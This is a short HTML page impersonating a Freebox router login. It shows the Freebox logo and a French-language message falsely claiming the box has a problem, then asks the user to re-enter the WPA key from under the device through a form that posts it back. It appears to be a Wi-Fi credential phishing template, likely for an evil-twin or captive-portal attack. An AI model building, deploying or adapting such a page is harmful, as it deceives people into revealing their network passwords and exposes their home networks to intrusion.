<!DOCTYPE html>
<html>
<head>
	<title>Freebox</title>
	<link rel="stylesheet" href="freebox.css" type="text/css">
</head>
<body>
	<form method="post">
		<!--<h1>Freebox configuration</h1>-->
		<img src="Freebox_Logo.svg" height="200" width="300">
		<h3>Votre freebox a rencontré un problème, veuillez saisir de nouveau votre clé WPA situé sous votre box</h3>
		<div>
			<input type="text" name="key">
			<input type="submit" name="">
		</div>
	</form>

	<script type="text/javascript" src="fonction.js"></script>

</body>
</html>